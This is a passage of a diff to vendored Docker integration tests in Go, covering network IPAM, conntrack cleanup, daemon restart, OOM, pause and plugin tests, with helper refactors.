"brNetForInspect") - newNetRes := []types.NetworkResource{} + var newNetRes []types.NetworkResource err = json.Unmarshal([]byte(out), &newNetRes) c.Assert(err, check.IsNil) c.Assert(newNetRes, checker.HasLen, 1) @@ -598,6 +590,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkConnectDisconnect(c *check.C) { } func (s *DockerNetworkSuite) TestDockerNetworkIPAMMultipleNetworks(c *check.C) { + testRequires(c, SameHostDaemon) // test0 bridge network dockerCmd(c, "network", "create", "--subnet=192.168.0.0/16", "test1") assertNwIsAvailable(c, "test1") @@ -638,6 +631,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkIPAMMultipleNetworks(c *check.C) { } func (s *DockerNetworkSuite) TestDockerNetworkCustomIPAM(c *check.C) { + testRequires(c, SameHostDaemon) // Create a bridge network using custom ipam driver dockerCmd(c, "network", "create", "--ipam-driver", dummyIPAMDriver, "br0") assertNwIsAvailable(c, "br0") @@ -653,6 +647,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkCustomIPAM(c *check.C) { } func (s *DockerNetworkSuite) TestDockerNetworkIPAMOptions(c *check.C) { + testRequires(c, SameHostDaemon) // Create a bridge network using custom ipam driver and options dockerCmd(c, "network", "create", "--ipam-driver", dummyIPAMDriver, "--ipam-opt", "opt1=drv1", "--ipam-opt", "opt2=drv2", "br0") assertNwIsAvailable(c, "br0") @@ -664,6 +659,22 @@ func (s *DockerNetworkSuite) TestDockerNetworkIPAMOptions(c *check.C) { c.Assert(opts["opt2"], checker.Equals, "drv2") } +func (s *DockerNetworkSuite) TestDockerNetworkNullIPAMDriver(c *check.C) { + testRequires(c, SameHostDaemon) + // Create a network with null ipam driver + _, _, err := dockerCmdWithError("network", "create", "-d", dummyNetworkDriver, "--ipam-driver", "null", "test000") + c.Assert(err, check.IsNil) + assertNwIsAvailable(c, "test000") + + // Verify the inspect data contains the default subnet provided by the null + // ipam driver and no gateway, as the null ipam driver does not provide one + nr := getNetworkResource(c, "test000") + c.Assert(nr.IPAM.Driver, checker.Equals, "null") + c.Assert(len(nr.IPAM.Config), checker.Equals, 1) + c.Assert(nr.IPAM.Config[0].Subnet, checker.Equals, "0.0.0.0/0") + c.Assert(nr.IPAM.Config[0].Gateway, checker.Equals, "") +} + func (s *DockerNetworkSuite) TestDockerNetworkInspectDefault(c *check.C) { nr := getNetworkResource(c, "none") c.Assert(nr.Driver, checker.Equals, "null") @@ -727,7 +738,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkInspectCustomSpecified(c *check.C) c.Assert(nr.IPAM.Config[0].Gateway, checker.Equals, "172.28.5.254") c.Assert(nr.Internal, checker.False) dockerCmd(c, "network", "rm", "br0") - assertNwNotAvailable(c, "test01") + assertNwNotAvailable(c, "br0") } func (s *DockerNetworkSuite) TestDockerNetworkIPAMInvalidCombinations(c *check.C) { @@ -755,6 +766,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkIPAMInvalidCombinations(c *check.C } func (s *DockerNetworkSuite) TestDockerNetworkDriverOptions(c *check.C) { + testRequires(c, SameHostDaemon) dockerCmd(c, "network", "create", "-d", dummyNetworkDriver, "-o", "opt1=drv1", "-o", "opt2=drv2", "testopt") assertNwIsAvailable(c, "testopt") gopts := remoteDriverNetworkRequest.Options[netlabel.GenericData] @@ -798,16 +810,14 @@ func (s *DockerDaemonSuite) TestDockerNetworkNoDiscoveryDefaultBridgeNetwork(c * hostsFile := "/etc/hosts" bridgeName := "external-bridge" bridgeIP := "192.169.255.254/24" - out, err := createInterface(c, "bridge", bridgeName, bridgeIP) - c.Assert(err, check.IsNil, check.Commentf(out)) + createInterface(c, "bridge", bridgeName, bridgeIP) defer deleteInterface(c, bridgeName) - err = s.d.StartWithBusybox("--bridge", bridgeName) - c.Assert(err, check.IsNil) - defer s.d.Restart() + s.d.StartWithBusybox(c, "--bridge", bridgeName) + defer s.d.Restart(c) // run two containers and store first container's etc/hosts content - out, err = s.d.Cmd("run", "-d", "busybox", "top") + out, err := s.d.Cmd("run", "-d", "busybox", "top") c.Assert(err, check.IsNil) cid1 := strings.TrimSpace(out) defer s.d.Cmd("stop", cid1) @@ -865,18 +875,15 @@ func (s *DockerNetworkSuite) TestDockerNetworkAnonymousEndpoint(c *check.C) { out, _ := dockerCmd(c, "run", "-d", "--net", cstmBridgeNw, "busybox", "top") cid1 := strings.TrimSpace(out) - hosts1, err := readContainerFileWithExec(cid1, hostsFile) - c.Assert(err, checker.IsNil) + hosts1 := readContainerFileWithExec(c, cid1, hostsFile) out, _ = dockerCmd(c, "run", "-d", "--net", cstmBridgeNw, "busybox", "top") cid2 := strings.TrimSpace(out) - hosts2, err := readContainerFileWithExec(cid2, hostsFile) - c.Assert(err, checker.IsNil) + hosts2 := readContainerFileWithExec(c, cid2, hostsFile) // verify first container etc/hosts file has not changed - hosts1post, err := readContainerFileWithExec(cid1, hostsFile) - c.Assert(err, checker.IsNil) + hosts1post := readContainerFileWithExec(c, cid1, hostsFile) c.Assert(string(hosts1), checker.Equals, string(hosts1post), check.Commentf("Unexpected %s change on anonymous container creation", hostsFile)) @@ -887,11 +894,8 @@ func (s *DockerNetworkSuite) TestDockerNetworkAnonymousEndpoint(c *check.C) { dockerCmd(c, "network", "connect", cstmBridgeNw1, cid2) - hosts2, err = readContainerFileWithExec(cid2, hostsFile) - c.Assert(err, checker.IsNil) - - hosts1post, err = readContainerFileWithExec(cid1, hostsFile) - c.Assert(err, checker.IsNil) + hosts2 = readContainerFileWithExec(c, cid2, hostsFile) + hosts1post = readContainerFileWithExec(c, cid1, hostsFile) c.Assert(string(hosts1), checker.Equals, string(hosts1post), check.Commentf("Unexpected %s change on container connect", hostsFile)) @@ -906,18 +910,16 @@ func (s *DockerNetworkSuite) TestDockerNetworkAnonymousEndpoint(c *check.C) { // Stop named container and verify first two containers' etc/hosts file hasn't changed dockerCmd(c, "stop", cid3) - hosts1post, err = readContainerFileWithExec(cid1, hostsFile) - c.Assert(err, checker.IsNil) + hosts1post = readContainerFileWithExec(c, cid1, hostsFile) c.Assert(string(hosts1), checker.Equals, string(hosts1post), check.Commentf("Unexpected %s change on name container creation", hostsFile)) - hosts2post, err := readContainerFileWithExec(cid2, hostsFile) - c.Assert(err, checker.IsNil) + hosts2post := readContainerFileWithExec(c, cid2, hostsFile) c.Assert(string(hosts2), checker.Equals, string(hosts2post), check.Commentf("Unexpected %s change on name container creation", hostsFile)) // verify that container 1 and 2 can't ping the named container now - _, _, err = dockerCmdWithError("exec", cid1, "ping", "-c", "1", cName) + _, _, err := dockerCmdWithError("exec", cid1, "ping", "-c", "1", cName) c.Assert(err, check.NotNil) _, _, err = dockerCmdWithError("exec", cid2, "ping", "-c", "1", cName) c.Assert(err, check.NotNil) @@ -950,6 +952,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkLinkOnDefaultNetworkOnly(c *check. } func (s *DockerNetworkSuite) TestDockerNetworkOverlayPortMapping(c *check.C) { + testRequires(c, SameHostDaemon) // Verify exposed ports are present in ps output when running a container on // a network managed by a driver which does not provide the default gateway // for the container @@ -976,7 +979,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkOverlayPortMapping(c *check.C) { } func (s *DockerNetworkSuite) TestDockerNetworkDriverUngracefulRestart(c *check.C) { - testRequires(c, DaemonIsLinux, NotUserNamespace) + testRequires(c, DaemonIsLinux, NotUserNamespace, SameHostDaemon) dnd := "dnd" did := "did" @@ -984,7 +987,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkDriverUngracefulRestart(c *check.C server := httptest.NewServer(mux) setupRemoteNetworkDrivers(c, mux, server.URL, dnd, did) - s.d.StartWithBusybox() + s.d.StartWithBusybox(c) _, err := s.d.Cmd("network", "create", "-d", dnd, "--subnet", "1.1.1.0/24", "net1") c.Assert(err, checker.IsNil) @@ -992,16 +995,12 @@ func (s *DockerNetworkSuite) TestDockerNetworkDriverUngracefulRestart(c *check.C c.Assert(err, checker.IsNil) // Kill daemon and restart - if err = s.d.cmd.Process.Kill(); err != nil { - c.Fatal(err) - } + c.Assert(s.d.Kill(), checker.IsNil) server.Close() startTime := time.Now().Unix() - if err = s.d.Restart(); err != nil { - c.Fatal(err) - } + s.d.Restart(c) lapse := time.Now().Unix() - startTime if lapse > 60 { // In normal scenarios, daemon restart takes ~1 second. @@ -1021,6 +1020,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkDriverUngracefulRestart(c *check.C } func (s *DockerNetworkSuite) TestDockerNetworkMacInspect(c *check.C) { + testRequires(c, SameHostDaemon) // Verify endpoint MAC address is correctly populated in container's network settings nwn := "ov" ctn := "bb" @@ -1062,7 +1062,7 @@ func (s *DockerSuite) TestInspectAPIMultipleNetworks(c *check.C) { c.Assert(bridge.IPAddress, checker.Equals, inspect121.NetworkSettings.IPAddress) } -func connectContainerToNetworks(c *check.C, d *Daemon, cName string, nws []string) { +func connectContainerToNetworks(c *check.C, d *daemon.Daemon, cName string, nws []string) { // Run a container on the default network out, err := d.Cmd("run", "-d", "--name", cName, "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) @@ -1076,7 +1076,7 @@ func connectContainerToNetworks(c *check.C, d *Daemon, cName string, nws []strin } } -func verifyContainerIsConnectedToNetworks(c *check.C, d *Daemon, cName string, nws []string) { +func verifyContainerIsConnectedToNetworks(c *check.C, d *daemon.Daemon, cName string, nws []string) { // Verify container is connected to all the networks for _, nw := range nws { out, err := d.Cmd("inspect", "-f", fmt.Sprintf("{{.NetworkSettings.Networks.%s}}", nw), cName) @@ -1086,16 +1086,17 @@ func verifyContainerIsConnectedToNetworks(c *check.C, d *Daemon, cName string, n } func (s *DockerNetworkSuite) TestDockerNetworkMultipleNetworksGracefulDaemonRestart(c *check.C) { + testRequires(c, SameHostDaemon) cName := "bb" nwList := []string{"nw1", "nw2", "nw3"} - s.d.StartWithBusybox() + s.d.StartWithBusybox(c) connectContainerToNetworks(c, s.d, cName, nwList) verifyContainerIsConnectedToNetworks(c, s.d, cName, nwList) // Reload daemon - s.d.Restart() + s.d.Restart(c) _, err := s.d.Cmd("start", cName) c.Assert(err, checker.IsNil) @@ -1104,19 +1105,18 @@ func (s *DockerNetworkSuite) TestDockerNetworkMultipleNetworksGracefulDaemonRest } func (s *DockerNetworkSuite) TestDockerNetworkMultipleNetworksUngracefulDaemonRestart(c *check.C) { + testRequires(c, SameHostDaemon) cName := "cc" nwList := []string{"nw1", "nw2", "nw3"} - s.d.StartWithBusybox() + s.d.StartWithBusybox(c) connectContainerToNetworks(c, s.d, cName, nwList) verifyContainerIsConnectedToNetworks(c, s.d, cName, nwList) // Kill daemon and restart - if err := s.d.cmd.Process.Kill(); err != nil { - c.Fatal(err) - } - s.d.Restart() + c.Assert(s.d.Kill(), checker.IsNil) + s.d.Restart(c) // Restart container _, err := s.d.Cmd("start", cName) @@ -1132,8 +1132,8 @@ func (s *DockerNetworkSuite) TestDockerNetworkRunNetByID(c *check.C) { } func (s *DockerNetworkSuite) TestDockerNetworkHostModeUngracefulDaemonRestart(c *check.C) { - testRequires(c, DaemonIsLinux, NotUserNamespace) - s.d.StartWithBusybox() + testRequires(c, DaemonIsLinux, NotUserNamespace, SameHostDaemon) + s.d.StartWithBusybox(c) // Run a few containers on host network for i := 0; i < 10; i++ { @@ -1141,22 +1141,18 @@ func (s *DockerNetworkSuite) TestDockerNetworkHostModeUngracefulDaemonRestart(c out, err := s.d.Cmd("run", "-d", "--name", cName, "--net=host", "--restart=always", "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) - // verfiy container has finished starting before killing daemon - err = s.d.waitRun(cName) + // verify container has finished starting before killing daemon + err = s.d.WaitRun(cName) c.Assert(err, checker.IsNil) } // Kill daemon ungracefully and restart - if err := s.d.cmd.Process.Kill(); err != nil { - c.Fatal(err) - } - if err := s.d.Restart(); err != nil { - c.Fatal(err) - } + c.Assert(s.d.Kill(), checker.IsNil) + s.d.Restart(c) // make sure all the containers are up and running for i := 0; i < 10; i++ { - err := s.d.waitRun(fmt.Sprintf("hostc-%d", i)) + err := s.d.WaitRun(fmt.Sprintf("hostc-%d", i)) c.Assert(err, checker.IsNil) } } @@ -1262,6 +1258,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkRestartWithMultipleNetworks(c *che } func (s *DockerNetworkSuite) TestDockerNetworkConnectDisconnectToStoppedContainer(c *check.C) { + testRequires(c, SameHostDaemon) dockerCmd(c, "network", "create", "test") dockerCmd(c, "create", "--name=foo", "busybox", "top") dockerCmd(c, "network", "connect", "test", "foo") @@ -1269,7 +1266,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkConnectDisconnectToStoppedContaine c.Assert(networks, checker.Contains, "test", check.Commentf("Should contain 'test' network")) // Restart docker daemon to test the config has persisted to disk - s.d.Restart() + s.d.Restart(c) networks = inspectField(c, "foo", "NetworkSettings.Networks") c.Assert(networks, checker.Contains, "test", check.Commentf("Should contain 'test' network")) @@ -1288,7 +1285,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkConnectDisconnectToStoppedContaine c.Assert(networks, checker.Not(checker.Contains), "test", check.Commentf("Should not contain 'test' network")) // Restart docker daemon to test the config has persisted to disk - s.d.Restart() + s.d.Restart(c) networks = inspectField(c, "foo", "NetworkSettings.Networks") c.Assert(networks, checker.Not(checker.Contains), "test", check.Commentf("Should not contain 'test' network")) @@ -1419,7 +1416,7 @@ func verifyIPAddresses(c *check.C, cName, nwname, ipv4, ipv6 string) { func (s *DockerNetworkSuite) TestDockerNetworkConnectLinkLocalIP(c *check.C) { // create one test network - dockerCmd(c, "network", "create", "n0") + dockerCmd(c, "network", "create", "--ipv6", "--subnet=2001:db8:1234::/64", "n0") assertNwIsAvailable(c, "n0") // run a container with incorrect link-local address @@ -1543,10 +1540,10 @@ func (s *DockerSuite) TestUserDefinedNetworkConnectDisconnectAlias(c *check.C) { dockerCmd(c, "network", "create", "-d", "bridge", "net1") dockerCmd(c, "network", "create", "-d", "bridge", "net2") - cid, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=first", "--net-alias=foo", "busybox", "top") + cid, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=first", "--net-alias=foo", "busybox:glibc", "top") c.Assert(waitRun("first"), check.IsNil) - dockerCmd(c, "run", "-d", "--net=net1", "--name=second", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=net1", "--name=second", "busybox:glibc", "top") c.Assert(waitRun("second"), check.IsNil) // ping first container and its alias @@ -1583,7 +1580,7 @@ func (s *DockerSuite) TestUserDefinedNetworkConnectDisconnectAlias(c *check.C) { c.Assert(err, check.IsNil) // verify the alias option is rejected when running on predefined network - out, _, err := dockerCmdWithError("run", "--rm", "--name=any", "--net-alias=any", "busybox", "top") + out, _, err := dockerCmdWithError("run", "--rm", "--name=any", "--net-alias=any", "busybox:glibc", "top") c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkAndAlias.Error()) @@ -1597,10 +1594,10 @@ func (s *DockerSuite) TestUserDefinedNetworkConnectivity(c *check.C) { testRequires(c, DaemonIsLinux, NotUserNamespace) dockerCmd(c, "network", "create", "-d", "bridge", "br.net1") - dockerCmd(c, "run", "-d", "--net=br.net1", "--name=c1.net1", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=br.net1", "--name=c1.net1", "busybox:glibc", "top") c.Assert(waitRun("c1.net1"), check.IsNil) - dockerCmd(c, "run", "-d", "--net=br.net1", "--name=c2.net1", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=br.net1", "--name=c2.net1", "busybox:glibc", "top") c.Assert(waitRun("c2.net1"), check.IsNil) // ping first container by its unqualified name @@ -1627,6 +1624,7 @@ func (s *DockerSuite) TestEmbeddedDNSInvalidInput(c *check.C) { func (s *DockerSuite) TestDockerNetworkConnectFailsNoInspectChange(c *check.C) { dockerCmd(c, "run", "-d", "--name=bb", "busybox", "top") c.Assert(waitRun("bb"), check.IsNil) + defer dockerCmd(c, "stop", "bb") ns0 := inspectField(c, "bb", "NetworkSettings.Networks.bridge") @@ -1644,9 +1642,9 @@ func (s *DockerSuite) TestDockerNetworkInternalMode(c *check.C) { nr := getNetworkResource(c, "internal") c.Assert(nr.Internal, checker.True) - dockerCmd(c, "run", "-d", "--net=internal", "--name=first", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=internal", "--name=first", "busybox:glibc", "top") c.Assert(waitRun("first"), check.IsNil) - dockerCmd(c, "run", "-d", "--net=internal", "--name=second", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=internal", "--name=second", "busybox:glibc", "top") c.Assert(waitRun("second"), check.IsNil) out, _, err := dockerCmdWithError("exec", "first", "ping", "-W", "4", "-c", "1", "www.google.com") c.Assert(err, check.NotNil) @@ -1670,10 +1668,8 @@ func (s *DockerNetworkSuite) TestDockerNetworkCreateDeleteSpecialCharacters(c *c func (s *DockerDaemonSuite) TestDaemonRestartRestoreBridgeNetwork(t *check.C) { testRequires(t, DaemonIsLinux) - if err := s.d.StartWithBusybox("--live-restore"); err != nil { - t.Fatal(err) - } - defer s.d.Stop() + s.d.StartWithBusybox(t, "--live-restore") + defer s.d.Stop(t) oldCon := "old" _, err := s.d.Cmd("run", "-d", "--name", oldCon, "-p", "80:80", "busybox", "top") @@ -1690,9 +1686,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartRestoreBridgeNetwork(t *check.C) { } // restart the daemon - if err := s.d.Start("--live-restore"); err != nil { - t.Fatal(err) - } + s.d.Start(t, "--live-restore") // start a new container, the new container's ip should not be the same with // old running container. @@ -1789,3 +1783,53 @@ func (s *DockerNetworkSuite) TestDockerNetworkDisconnectFromBridge(c *check.C) { _, _, err := dockerCmdWithError("network", "disconnect", network, name) c.Assert(err, check.IsNil) } + +// TestConntrackFlowsLeak covers the failure scenario of ticket: https://github.com/docker/docker/issues/8795 +// Validates that conntrack is correctly cleaned once a container is destroyed +func (s *DockerNetworkSuite) TestConntrackFlowsLeak(c *check.C) { + testRequires(c, IsAmd64, DaemonIsLinux, Network, SameHostDaemon) + + // Create a new network + cli.DockerCmd(c, "network", "create", "--subnet=192.168.10.0/24", "--gateway=192.168.10.1", "-o", "com.docker.network.bridge.host_binding_ipv4=192.168.10.1", "testbind") + assertNwIsAvailable(c, "testbind") + + // Launch the server, this will remain listening on an exposed port and reply to any request in a ping/pong fashion + cmd := "while true; do echo hello | nc -w 1 -lu 8080; done" + cli.DockerCmd(c, "run", "-d", "--name", "server", "--net", "testbind", "-p", "8080:8080/udp", "appropriate/nc", "sh", "-c", cmd) + + // Launch a container client, here the objective is to create a flow that is natted in order to expose the bug + cmd = "echo world | nc -q 1 -u 192.168.10.1 8080" + cli.DockerCmd(c, "run", "-d", "--name", "client", "--net=host", "appropriate/nc", "sh", "-c", cmd) + + // Get all the flows using netlink + flows, err := netlink.ConntrackTableList(netlink.ConntrackTable, unix.AF_INET) + c.Assert(err, check.IsNil) + var flowMatch int + for _, flow := range flows { + // count only the flows that we are interested in, skipping others that can be laying around the host + if flow.Forward.Protocol == unix.IPPROTO_UDP && + flow.Forward.DstIP.Equal(net.ParseIP("192.168.10.1")) && + flow.Forward.DstPort == 8080 { + flowMatch++ + } + } + // The client should have created only 1 flow + c.Assert(flowMatch, checker.Equals, 1) + + // Now delete the server, this will trigger the conntrack cleanup + cli.DockerCmd(c, "rm", "-fv", "server") + + // Fetch again all the flows and validate that there is no server flow in the conntrack laying around + flows, err = netlink.ConntrackTableList(netlink.ConntrackTable, unix.AF_INET) + c.Assert(err, check.IsNil) + flowMatch = 0 + for _, flow := range flows { + if flow.Forward.Protocol == unix.IPPROTO_UDP && + flow.Forward.DstIP.Equal(net.ParseIP("192.168.10.1")) && + flow.Forward.DstPort == 8080 { + flowMatch++ + } + } + // All the flows have to be gone + c.Assert(flowMatch, checker.Equals, 0) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go deleted file mode 100644 index bcf59f8601..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go +++ /dev/null @@ -1,30 +0,0 @@ -// +build !windows - -package main - -import ( - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestInspectOomKilledTrue(c *check.C) { - testRequires(c, DaemonIsLinux, memoryLimitSupport, swapMemorySupport) - - name := "testoomkilled" - _, exitCode, _ := dockerCmdWithError("run", "--name", name, "--memory", "32MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done") - - c.Assert(exitCode, checker.Equals, 137, check.Commentf("OOM exit should be 137")) - - oomKilled := inspectField(c, name, "State.OOMKilled") - c.Assert(oomKilled, checker.Equals, "true") -} - -func (s *DockerSuite) TestInspectOomKilledFalse(c *check.C) { - testRequires(c, DaemonIsLinux, memoryLimitSupport, swapMemorySupport) - - name := "testoomkilled" - dockerCmd(c, "run", "--name", name, "--memory", "32MB", "busybox", "sh", "-c", "echo hello world") - - oomKilled := inspectField(c, name, "State.OOMKilled") - c.Assert(oomKilled, checker.Equals, "false") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go deleted file mode 100644 index 9217a69968..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go +++ /dev/null @@ -1,66 +0,0 @@ -package main - -import ( - "strings" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestPause(c *check.C) { - testRequires(c, IsPausable) - defer unpauseAllContainers() - - name := "testeventpause" - runSleepingContainer(c, "-d", "--name", name) - - dockerCmd(c, "pause", name) - pausedContainers, err := getSliceOfPausedContainers() - c.Assert(err, checker.IsNil) - c.Assert(len(pausedContainers), checker.Equals, 1) - - dockerCmd(c, "unpause", name) - - out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c)) - events := strings.Split(strings.TrimSpace(out), "\n") - actions := eventActionsByIDAndType(c, events, name, "container") - - c.Assert(actions[len(actions)-2], checker.Equals, "pause") - c.Assert(actions[len(actions)-1], checker.Equals, "unpause") -} - -func (s *DockerSuite) TestPauseMultipleContainers(c *check.C) { - testRequires(c, IsPausable) - defer unpauseAllContainers() - - containers := []string{ - "testpausewithmorecontainers1", - "testpausewithmorecontainers2", - } - for _, name := range containers { - runSleepingContainer(c, "-d", "--name", name) - } - dockerCmd(c, append([]string{"pause"}, containers...)...) - pausedContainers, err := getSliceOfPausedContainers() - c.Assert(err, checker.IsNil) - c.Assert(len(pausedContainers), checker.Equals, len(containers)) - - dockerCmd(c, append([]string{"unpause"}, containers...)...) - - out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c)) - events := strings.Split(strings.TrimSpace(out), "\n") - - for _, name := range containers { - actions := eventActionsByIDAndType(c, events, name, "container") - - c.Assert(actions[len(actions)-2], checker.Equals, "pause") - c.Assert(actions[len(actions)-1], checker.Equals, "unpause") - } -} - -func (s *DockerSuite) TestPauseFailsOnWindowsServerContainers(c *check.C) { - testRequires(c, DaemonIsWindows, NotPausable) - runSleepingContainer(c, "-d", "--name=test") - out, _, _ := dockerCmdWithError("pause", "test") - c.Assert(out, checker.Contains, "cannot pause Windows Server Containers") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_logdriver_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_logdriver_test.go new file mode 100644 index 0000000000..7d1ffcb632 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_logdriver_test.go @@ -0,0 +1,48 @@ +package main + +import ( + "context" + "strings" + + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestPluginLogDriver(c *check.C) { + testRequires(c, IsAmd64, DaemonIsLinux) + + pluginName := "cpuguy83/docker-logdriver-test:latest" + + dockerCmd(c, "plugin", "install", pluginName) + dockerCmd(c, "run", "--log-driver", pluginName, "--name=test", "busybox", "echo", "hello") + out, _ := dockerCmd(c, "logs", "test") + c.Assert(strings.TrimSpace(out), checker.Equals, "hello") + + dockerCmd(c, "start", "-a", "test") + out, _ = dockerCmd(c, "logs", "test") + c.Assert(strings.TrimSpace(out), checker.Equals, "hello\nhello") + + dockerCmd(c, "rm", "test") + dockerCmd(c, "plugin", "disable", pluginName) + dockerCmd(c, "plugin", "rm", pluginName) +} + +// Make sure log drivers are listed in info, and v2 plugins are not. +func (s *DockerSuite) TestPluginLogDriverInfoList(c *check.C) { + testRequires(c, IsAmd64, DaemonIsLinux) + pluginName := "cpuguy83/docker-logdriver-test" + + dockerCmd(c, "plugin", "install", pluginName) + + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + info, err := cli.Info(context.Background()) + c.Assert(err, checker.IsNil) + + drivers := strings.Join(info.Plugins.Log, " ") + c.Assert(drivers, checker.Contains, "json-file") + c.Assert(drivers, checker.Not(checker.Contains), pluginName) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go index 380357d303..391c74aa5d 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go @@ -1,16 +1,22 @@ package main import ( + "context" "fmt" - "os/exec" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" - "io/ioutil" + "net/http" "os" + "path" "path/filepath" "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/daemon" + "github.com/docker/docker/internal/test/fixtures/plugin" + "github.com/go-check/check" ) var ( @@ -22,40 +28,40 @@ var ( npNameWithTag = npName + ":" + pTag ) -func (s *DockerSuite) TestPluginBasicOps(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) - _, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag) +func (ps *DockerPluginSuite) TestPluginBasicOps(c *check.C) { + plugin := ps.getPluginRepoWithTag() + _, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", plugin) c.Assert(err, checker.IsNil) out, _, err := dockerCmdWithError("plugin", "ls") c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, pName) - c.Assert(out, checker.Contains, pTag) + c.Assert(out, checker.Contains, plugin) c.Assert(out, checker.Contains, "true") - id, _, err := dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", pNameWithTag) + id, _, err := dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", plugin) id = strings.TrimSpace(id) c.Assert(err, checker.IsNil) - out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag) + out, _, err = dockerCmdWithError("plugin", "remove", plugin) c.Assert(err, checker.NotNil) c.Assert(out, checker.Contains, "is enabled") - _, _, err = dockerCmdWithError("plugin", "disable", pNameWithTag) + _, _, err = dockerCmdWithError("plugin", "disable", plugin) c.Assert(err, checker.IsNil) - out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag) + out, _, err = dockerCmdWithError("plugin", "remove", plugin) c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, pNameWithTag) + c.Assert(out, checker.Contains, plugin) - _, err = os.Stat(filepath.Join(dockerBasePath, "plugins", id)) + _, err = os.Stat(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "plugins", id)) if !os.IsNotExist(err) { c.Fatal(err) } } -func (s *DockerSuite) TestPluginForceRemove(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) +func (ps *DockerPluginSuite) TestPluginForceRemove(c *check.C) { + pNameWithTag := ps.getPluginRepoWithTag() + out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag) c.Assert(err, checker.IsNil) @@ -69,6 +75,7 @@ func (s *DockerSuite) TestPluginForceRemove(c *check.C) { func (s *DockerSuite) TestPluginActive(c *check.C) { testRequires(c, DaemonIsLinux, IsAmd64, Network) + _, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag) c.Assert(err, checker.IsNil) @@ -116,8 +123,9 @@ func (s *DockerSuite) TestPluginActiveNetwork(c *check.C) { c.Assert(out, checker.Contains, npNameWithTag) } -func (s *DockerSuite) TestPluginInstallDisable(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) +func (ps *DockerPluginSuite) TestPluginInstallDisable(c *check.C) { + pName := ps.getPluginRepoWithTag() + out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", "--disable", pName) c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Contains, pName) @@ -148,22 +156,66 @@ func (s *DockerSuite) TestPluginInstallDisableVolumeLs(c *check.C) { dockerCmd(c, "volume", "ls") } -func (s *DockerSuite) TestPluginSet(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) - out, _ := dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--disable", pName) - c.Assert(strings.TrimSpace(out), checker.Contains, pName) - - env, _ := dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", pName) +func (ps *DockerPluginSuite) TestPluginSet(c *check.C) { + client := testEnv.APIClient() + + name := "test" + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + + initialValue := "0" + mntSrc := "foo" + devPath := "/dev/bar" + + // Create a new plugin with extra settings + err := plugin.Create(ctx, client, name, func(cfg *plugin.Config) { + cfg.Env = []types.PluginEnv{{Name: "DEBUG", Value: 